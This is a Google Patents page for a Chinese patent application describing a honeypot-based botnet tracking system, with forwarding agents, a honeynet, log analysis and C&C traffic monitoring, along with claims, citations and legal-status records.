CN111083117A - Botnet tracking and tracing system based on honeypots - Google Patents
Botnet tracking and tracing system based on honeypots Download PDFInfo
- Publication number
- CN111083117A CN111083117A CN201911161703.1A CN201911161703A CN111083117A CN 111083117 A CN111083117 A CN 111083117A CN 201911161703 A CN201911161703 A CN 201911161703A CN 111083117 A CN111083117 A CN 111083117A
- Authority
- CN
- China
- Prior art keywords
- honeypot
- botnet
- honeypots
- attack
- communication
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1458—Denial of Service
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1483—Countermeasures against malicious traffic service impersonation, e.g. phishing, pharming or web spoofing
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
Abstract
The invention discloses a honeypot-based botnet tracking and tracing system, which relates to the field of computer network security and comprises a honeypot system, a log recording and analyzing system and a botnet tracking system; the system of the invention captures and records the attack process by using the honeypot provided with the forwarding agent, the honeypot only receives the traffic from the forwarding agent, and all the traffic sent outwards passes through the forwarding agent; the forwarding agent is deployed in a network, receives, records and forwards the request of an attacker, and carries and isolates the attack by using the honeypot; the system uses the forwarding agent to monitor the connection of honeypots infected with malicious samples to the outside world, record the activity of botnet, and alarm the discovered attack behavior. Compared with a traditional honeypot system, the system has better secrecy and flexibility, and can be flexibly expanded according to the use condition.
Description
Technical Field
The invention relates to the field of computer network security, in particular to a botnet tracing system based on honeypots.
Background
Botnet (Botnet) refers to a network composed of infected hosts, a malicious process running in the infected hosts is called Bot, and an attacker operates and controls a control server (C & C server) through instructions to attack the outside world. Botnets have the greatest advantage of having a large number of hosts available for attack. Botnets are one of the most serious security threats in today's network environment and are used for a variety of malicious activities against systems and services, including denial of service attacks, spam distribution, phishing, click fraud, and the like. Most botnets use common protocols to communicate and use a hiding technology to hide a back-end C & C server, so that the botnets are difficult to detect and monitor. Botnets have become one of the biggest threats to network security due to their large size and strong concealment.
The lifecycle of botnets comprises six phases: the six stages of construction, recruitment, interaction, sales, attack execution and completion are linear. This means that the successful execution of a botnet attack requires the successful completion of all previous phases. Most botnets use certain hiding techniques to ensure self-concealment, and currently, common techniques include encryption, polymorphism, IP spoofing, FF networks, and the like.
Regarding detection of botnets, there are two main detection methods at present: honeypot based detection and traffic monitoring based detection. Honeypots are widely used in malicious sample collection and research. Detection based on traffic snooping can be subdivided into signature-based, anomaly-based, DNS-based, and data mining-based. Effective network security management depends in large part on providing accurate, concise, and high quality information about malicious activities in a network, and honeypots are an effective tool for achieving this. Honeypots, while not capable of direct detection of infection, are one of the most effective tools for collecting and studying malicious samples. Meanwhile, honeypots also have their disadvantages. In summary, botnet tracking tools require an understanding of the communication modes of botnet C & C communications that would otherwise be recognized by attackers due to communication errors during the interaction phase, and the continued progress of inverse analysis techniques makes the development of tracking tools more difficult.
Therefore, those skilled in the art are dedicated to develop a honeypot-based botnet tracing system, which is combined with manual analysis of malicious samples, and realizes tracing of botnets by simulating or analyzing communication in botnets with the aid of a log recording and analyzing system.
Disclosure of Invention
In view of the above defects in the prior art, the technical problem to be solved by the present invention is to develop a novel honeypot tracing system which has better privacy and flexibility and can be flexibly expanded according to the use condition.
In order to achieve the purpose, the invention provides a botnet tracking and tracing system based on honeypots, which is characterized by comprising a honeypot system, a log recording and analyzing system and a botnet tracking system; the honeypot system comprises a forwarding agent and a honeypot, and is used for forging a real network environment and capturing a malicious sample; the forwarding agent is deployed at the network boundary and used for acquiring and recording communication from the Internet, forwarding the communication to the honeypot, maintaining the communication between the two parties when an attack is carried out, and finally storing the attack process as a log, wherein the honeypot bears the attack and isolates the activity of an attacker in the honeypot; the log recording and analyzing system and the honeypot system work cooperatively, the attack process is recorded in a log form, and an attack portrait and a malicious sample are extracted from the log; the botnet tracking system isolates and listens to communications between infected honeypots and attackers to record attacker behavior and botnet activity.
Further, the honeypot system monitors the honeypot using only the forwarding agent.
Furthermore, the honeypot system maintains a honeynet architecture, so that a virtual network structure is formed among a plurality of honeypots to confuse attackers.
Further, malicious samples captured by the logging and analysis system may be used for tracing and tracing the botnet and for protecting against attacks.
Further, the botnet tracking system may be used to discover and pre-warn of attack behavior.
Further, the malicious sample is analyzed using human labor.
Further, the botnet tracking system realizes the tracking of the botnet by simulating or analyzing the communication in the botnet.
Further, the communication mode of the botnet may be used for research and defense.
The invention also provides a honeypot-based botnet malicious sample capturing process, which is characterized by comprising the following steps of:
step 101, deploying and configuring honeypots, wherein the honeypots can adopt dockers, virtual machines and the like, and basic network services such as FTP (file transfer protocol), Web and the like are configured in the honeypots;
102, deploying forwarding agents at different positions in the network, opening general service ports such as 22 and 80 to the outside, configuring forwarding destinations into honeypots, and configuring honeynet nodes to form a false network structure among the honeypots;
103, finding the open port of the forwarding agent by an attacker through a scanning tool, and attacking;
104, the forwarding agent receives the attacker connection request, forwards the communication to the honeypot, and stores all the communication as a log;
105, enabling the honeypot to normally carry out an attack process, and isolating the attack within the honeypot range;
and step 106, if the attacker tries to attack other hosts in the internal network by taking the infected honeypot as a springboard, the forwarding agent forwards the attack to other honeypots, so that the attacker mistakenly thinks that the attacker is in the network of an organization.
The invention also provides a botnet tracking and tracing process based on honeypots, which is characterized by comprising the following steps:
step 107, the expert A analyzes the log stored in the infected honeypot;
step 108, the expert A uses a log recording and analyzing system to perform primary processing on the log to obtain an attack portrait and a malicious sample;
step 109, the expert A carries out reverse analysis on the malicious sample to obtain the address of the C & C server, the communication protocol between Bot and the C & C server and the encryption mode;
step 110, using the information obtained by analysis to perfect the forwarding agent;
step 111, the forwarding agent intercepts and records the communication between the malicious sample in the infected honeypot and the outside world, and stores the communication as a log;
step 112, monitoring the communication flow of the infected honeypots;
and 113, if an attack instruction is found in the monitoring process, alarming.
The invention uses the honeypot with the forwarding agent to capture and record the attack process. The forwarding agent is deployed in the network, receives, records and forwards the request of the attacker, and carries and isolates the attack by using the honeypot. Honeypots only accept traffic from agents and all traffic sent out goes through agents. The forwarding agent has the function of maintaining the structure of the honey net besides the functions of recording the attack process and forwarding the command of the attacker. Specifically, each honeypot in the honeynet is assigned one or one interval of IP addresses, and when an agent detects that the honeypot sends a malicious data packet with a target address of the corresponding IP, the malicious data packet is forwarded to an agent of another honeypot to simulate a real network environment. This approach can effectively combat behavior-based honeypot detection methods. For the system-level fingerprint identification and detection vector detection method, the honeypot system monitors the flow by using the forwarding agent, and does not directly use a monitoring tool, so that the probability of detection by the two detection methods is reduced.
The conception, the specific structure and the technical effects of the present invention will be further described with reference to the accompanying drawings to fully understand the objects, the features and the effects of the present invention.
Drawings
FIG. 1 is a schematic diagram of a botnet tracing system based on honeypots in accordance with a preferred embodiment of the present invention;
FIG. 2 is a flowchart of the operation of a botnet tracing system based on honeypots in accordance with a preferred embodiment of the present invention;
FIG. 3 is a schematic diagram of a botnet tracking and tracing system honeypot system based on honeypots in accordance with a preferred embodiment of the present invention;
FIG. 4 is a schematic diagram of a botnet tracking and tracing system logging and analysis system based on honeypots in accordance with a preferred embodiment of the present invention;
FIG. 5 is a schematic diagram of a botnet tracking system of the honeypot based botnet tracking traceability system in accordance with a preferred embodiment of the present invention.
Detailed Description
The technical contents of the preferred embodiments of the present invention will be more clearly and easily understood by referring to the drawings attached to the specification. The present invention may be embodied in many different forms of embodiments and the scope of the invention is not limited to the embodiments set forth herein.
As shown in figure 1, the invention designs a traceability tracking system of botnet based on honeypots, which forges real network environment through honeynets and forwarding agents, and meanwhile, only uses the forwarding agents to monitor honeypots, thereby improving concealment and deception. The botnet tracking system is deployed in a network, a honeypot system is used for capturing malicious samples, the malicious samples are analyzed manually, and tracking of the botnet is achieved by simulating or analyzing communication in the botnet under the assistance of a log recording and analyzing system. The system is shown as consisting of the following modules, including:
1) a honeypot system: the system is deployed at the network boundary, acquires and records communication from the Internet, forwards the communication to the honeypot, maintains the communication of both parties when the attack is carried out, and finally stores the attack process as a log;
2) the log recording and analyzing system comprises: the method is characterized by cooperating with a honeypot system, recording an attack process in a log form, and extracting an attack portrait and a malicious sample by analyzing the log;
3) botnet tracking system: the method adopts a mode of simulating the communication behavior of the malicious sample and the malicious sample C & C server or isolating and monitoring the communication of the infected honeypot to record the behavior of an attacker and discover and alarm attack activities.
A botnet tracing traceability system workflow based on honeypots is shown in fig. 2.
And deploying honeypot systems at different positions in the network, selecting a Docker, a virtual machine or a physical host by the target honeypot according to actual conditions, and configuring corresponding services in the target honeypot. To save resources, the target honeypots of the honeypot system at different locations can be the same. Since honeypots do not provide any actual service, any access and operation to honeypots is considered suspicious attack behavior. One normal operation honeypot can capture all attack behaviors without missing reports. In the system designed by the invention, the honeypot saves all communication between the attacker and the honeypot in the attack process as a log. Next, a manual work is introduced to process the log. First, the log is initially processed using a logging and analysis system. The log recording and analyzing system can restore the attack flow and extract tools and malicious samples uploaded by an attacker. Next, the expert a performs reverse analysis on the malicious sample to obtain the address of the C & C server, the communication protocol between Bot and the C & C server, and the encryption mode. And finally, monitoring the infected honeypots according to the information obtained by analysis to obtain the botnet activity record.
Figure 3 shows a honeypot system based on a botnet tracing system for honeypots.
The honeypot system is a main component of the system, and aims to provide a forged network environment which simulates a real system, attract attackers to attack the system so as to obtain an attack process and a malicious sample, and in addition, the infected honeypot can be used for post-zombie network tracking. The module mainly comprises a forwarding agent part and a honeypot part. The forwarding agent is deployed in the network, exposes ports to the outside world, and waits for an attacker to connect. When the agent receives the attacker connection request, the agent establishes connection with the corresponding honeypot, records the data message sent by the attacker, and forwards the data message to the honeypot. The honeypot is used for bearing attacks and isolating malicious samples, manual management is adopted for the honeypot, and the honeypot can use Docker, a virtual machine or an isolated real host.
Figure 4 shows a logging and analysis system for a honeypot based botnet tracing traceability system.
The log recording and analyzing system aims to provide a log function in the working process of the honeypot system and provide assistance when security personnel analyze the attack process. During the operation of the honeypot system, a logging interface is called, the captured communication is transmitted to a logging and analyzing system, and the logging and analyzing system records the attack process in a format easy to analyze by security personnel. In addition, in the process of analyzing the malicious samples, researchers call a log analysis interface to obtain the analysis of the attack process and the malicious samples captured by the honeypot system.
Figure 5 shows a botnet tracking system based on a honeypot botnet tracking provenance system.
And monitoring the communication between the botnet malicious sample and the C & C server by setting a forwarding agent. And the forwarding agent intercepts, records and forwards the communication between the C & C server and the malicious sample. The foregoing detailed description of the preferred embodiments of the invention has been presented.
It should be understood that numerous modifications and variations could be devised by those skilled in the art in light of the present teachings without departing from the inventive concepts. Therefore, the technical solutions available to those skilled in the art through logic analysis, reasoning and limited experiments based on the prior art according to the concept of the present invention should be within the scope of protection defined by the claims.
Claims (10)
1. A botnet tracking and tracing system based on honeypots is characterized by comprising a honeypot system, a log recording and analyzing system and a botnet tracking system; the honeypot system comprises a forwarding agent and a honeypot, and is used for forging a real network environment and capturing a malicious sample; the forwarding agent is deployed at the network boundary and used for acquiring and recording communication from the Internet, forwarding the communication to the honeypot, maintaining the communication between the two parties when an attack is carried out, and finally storing the attack process as a log, wherein the honeypot bears the attack and isolates the activity of an attacker in the honeypot; the log recording and analyzing system and the honeypot system work cooperatively, the attack process is recorded in a log form, and an attack portrait and a malicious sample are extracted from the log; the botnet tracking system isolates and listens to communications between infected honeypots and attackers to record attacker behavior and botnet activity.
2. The botnet-based traceability system of honeypots of claim 1, wherein the honeypot system monitors the honeypots using only the forwarding agents.
3. The system of claim 1, wherein the honeypot system maintains a honeypot framework that forms a virtual network structure between honeypots to confuse attackers.
4. The honeypot-based botnet tracing system of claim 1, wherein malicious samples captured by the logging and analysis system can be used for tracing and defending against attacks on botnets.
5. The honeypot-based botnet tracing system of claim 1, wherein the botnet tracing system is operable to discover and pre-warn of offensive behavior.
6. The honeypot-based botnet tracing system of claim 1, wherein the malicious samples are analyzed using a human.
7. The honeypot-based botnet tracing system of claim 1, wherein the botnet tracing system enables tracing of botnets by mimicking or parsing communications in botnets.
8. The honeypot-based botnet traceability system of claim 1, wherein the communication mode of the botnet can be used for research and defense.
9. A botnet malicious sample capturing process based on honeypots is characterized by comprising the following steps:
step 101, deploying and configuring honeypots, wherein the honeypots can adopt dockers, virtual machines and the like, and basic network services such as FTP (file transfer protocol), Web and the like are configured in the honeypots;
102, deploying forwarding agents at different positions in the network, opening general service ports such as 22 and 80 to the outside, configuring forwarding destinations into honeypots, and configuring honeynet nodes to form a false network structure among the honeypots;
103, finding the open port of the forwarding agent by an attacker through a scanning tool, and attacking;
104, the forwarding agent receives the attacker connection request, forwards the communication to the honeypot, and stores all the communication as a log;
105, enabling the honeypot to normally carry out an attack process, and isolating the attack within the honeypot range;
and step 106, if the attacker tries to attack other hosts in the internal network by taking the infected honeypot as a springboard, the forwarding agent forwards the attack to other honeypots, so that the attacker mistakenly thinks that the attacker is in the network of an organization.
10. A botnet tracing and tracing process based on honeypots is characterized by comprising the following steps:
step 107, the expert A analyzes the log stored in the infected honeypot;
step 108, the expert A uses a log recording and analyzing system to perform primary processing on the log to obtain an attack portrait and a malicious sample;
step 109, the expert A carries out reverse analysis on the malicious sample to obtain the address of the C & C server, the communication protocol between Bot and the C & C server and the encryption mode;
step 110, using the information obtained by analysis to perfect the forwarding agent;
step 111, the forwarding agent intercepts and records the communication between the malicious sample in the infected honeypot and the outside world, and stores the communication as a log;
step 112, monitoring the communication flow of the infected honeypots;
and 113, if an attack instruction is found in the monitoring process, alarming.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201911161703.1A CN111083117A (en) | 2019-11-22 | 2019-11-22 | Botnet tracking and tracing system based on honeypots |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201911161703.1A CN111083117A (en) | 2019-11-22 | 2019-11-22 | Botnet tracking and tracing system based on honeypots |
Publications (1)
Publication Number | Publication Date |
---|---|
CN111083117A true CN111083117A (en) | 2020-04-28 |
Family
ID=70311832
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201911161703.1A Pending CN111083117A (en) | 2019-11-22 | 2019-11-22 | Botnet tracking and tracing system based on honeypots |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN111083117A (en) |
Cited By (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN111835758A (en) * | 2020-07-10 | 2020-10-27 | 四川长虹电器股份有限公司 | Honeypot attacker tracing method based on TCP/UDP transparent proxy |
CN112003842A (en) * | 2020-08-12 | 2020-11-27 | 杭州安恒信息安全技术有限公司 | High-interaction honeypot system and honeypot protection method |
CN112291247A (en) * | 2020-10-30 | 2021-01-29 | 四川长虹电器股份有限公司 | Flow forwarding-based honey net system for high coverage detection of local area network |
CN112788065A (en) * | 2021-02-20 | 2021-05-11 | 苏州知微安全科技有限公司 | Internet of things zombie network tracking method and device based on honeypots and sandboxes |
CN114003903A (en) * | 2021-12-28 | 2022-02-01 | 北京微步在线科技有限公司 | Network attack tracing method and device |
CN114070630A (en) * | 2021-11-17 | 2022-02-18 | 国网四川省电力公司眉山供电公司 | Viscous honeypot system and interaction method thereof |
CN115102785A (en) * | 2022-07-25 | 2022-09-23 | 远江盛邦(北京)网络安全科技股份有限公司 | Automatic tracing system and method for network attack |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102790778A (en) * | 2012-08-22 | 2012-11-21 | 常州大学 | DDos (distributed denial of service) attack defensive system based on network trap |
EP2903238A2 (en) * | 2014-02-03 | 2015-08-05 | Deutsche Telekom AG | A router-based honeypot for detecting advanced persistent threats |
CN107707576A (en) * | 2017-11-28 | 2018-02-16 | 深信服科技股份有限公司 | A kind of network defense method and system based on Honeypot Techniques |
CN109768993A (en) * | 2019-03-05 | 2019-05-17 | 中国人民解放军32082部队 | A kind of high covering Intranet honey pot system |
CN109962912A (en) * | 2019-03-06 | 2019-07-02 | 中国信息安全测评中心 | A kind of defence method and system based on the drainage of honey jar flow |
CN110225064A (en) * | 2019-07-02 | 2019-09-10 | 恒安嘉新(北京)科技股份公司 | Monitor method, apparatus, equipment and the storage medium of Botnet attack |
-
2019
- 2019-11-22 CN CN201911161703.1A patent/CN111083117A/en active Pending
Patent Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102790778A (en) * | 2012-08-22 | 2012-11-21 | 常州大学 | DDos (distributed denial of service) attack defensive system based on network trap |
EP2903238A2 (en) * | 2014-02-03 | 2015-08-05 | Deutsche Telekom AG | A router-based honeypot for detecting advanced persistent threats |
CN107707576A (en) * | 2017-11-28 | 2018-02-16 | 深信服科技股份有限公司 | A kind of network defense method and system based on Honeypot Techniques |
CN109768993A (en) * | 2019-03-05 | 2019-05-17 | 中国人民解放军32082部队 | A kind of high covering Intranet honey pot system |
CN109962912A (en) * | 2019-03-06 | 2019-07-02 | 中国信息安全测评中心 | A kind of defence method and system based on the drainage of honey jar flow |
CN110225064A (en) * | 2019-07-02 | 2019-09-10 | 恒安嘉新(北京)科技股份公司 | Monitor method, apparatus, equipment and the storage medium of Botnet attack |
Cited By (8)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN111835758A (en) * | 2020-07-10 | 2020-10-27 | 四川长虹电器股份有限公司 | Honeypot attacker tracing method based on TCP/UDP transparent proxy |
CN112003842A (en) * | 2020-08-12 | 2020-11-27 | 杭州安恒信息安全技术有限公司 | High-interaction honeypot system and honeypot protection method |
CN112291247A (en) * | 2020-10-30 | 2021-01-29 | 四川长虹电器股份有限公司 | Flow forwarding-based honey net system for high coverage detection of local area network |
CN112788065A (en) * | 2021-02-20 | 2021-05-11 | 苏州知微安全科技有限公司 | Internet of things zombie network tracking method and device based on honeypots and sandboxes |
CN114070630A (en) * | 2021-11-17 | 2022-02-18 | 国网四川省电力公司眉山供电公司 | Viscous honeypot system and interaction method thereof |
CN114003903A (en) * | 2021-12-28 | 2022-02-01 | 北京微步在线科技有限公司 | Network attack tracing method and device |
CN114003903B (en) * | 2021-12-28 | 2022-03-08 | 北京微步在线科技有限公司 | Network attack tracing method and device |
CN115102785A (en) * | 2022-07-25 | 2022-09-23 | 远江盛邦(北京)网络安全科技股份有限公司 | Automatic tracing system and method for network attack |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN111083117A (en) | Botnet tracking and tracing system based on honeypots | |
EP1665011B1 (en) | Method and system for displaying network security incidents | |
CN101567887B (en) | Vulnerability simulation overload honeypot method | |
CN105915532B (en) | A kind of recognition methods of host of falling and device | |
CN111756712B (en) | Method for forging IP address and preventing attack based on virtual network equipment | |
CN107770199A (en) | It is a kind of towards industry internet with the industry control agreement honey jar of self-learning function and application | |
CN107070929A (en) | A kind of industry control network honey pot system | |
US20070067841A1 (en) | Scalable monitor of malicious network traffic | |
US20110154492A1 (en) | Malicious traffic isolation system and method using botnet information | |
CN101924757A (en) | Method and system for reviewing Botnet | |
CN113691566B (en) | Mail server secret stealing detection method based on space mapping and network flow statistics | |
CN111641620A (en) | Novel cloud honeypot method and framework for detecting evolution DDoS attack | |
Kaushik et al. | Network forensic system for port scanning attack | |
CN111541670A (en) | Novel dynamic honeypot system | |
CN112948821A (en) | APT detection early warning method | |
CN113422774A (en) | Automatic penetration testing method and device based on network protocol and storage medium | |
Li et al. | The research and design of honeypot system applied in the LAN security | |
CN113572730A (en) | Implementation method for actively and automatically trapping honeypots based on web | |
Lin et al. | Implementation of an SDN-based security defense mechanism against DDoS attacks | |
Ren et al. | Distributed agent-based real time network intrusion forensics system architecture design | |
CN110912887A (en) | Bro-based APT monitoring system and method | |
CN112565197A (en) | Third-party interactive honeypot implementation method based on internal and external network drainage abnormity | |
CN116760607A (en) | Method and device for establishing honeypot trapping node, medium and equipment | |
CN112751861A (en) | Malicious mail detection method and system based on dense network and network big data | |
CN111726810A (en) | Wireless signal monitoring and wireless communication behavior auditing system in numerical control processing environment |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
RJ01 | Rejection of invention patent application after publication | ||
RJ01 | Rejection of invention patent application after publication |
Application publication date: 20200428 |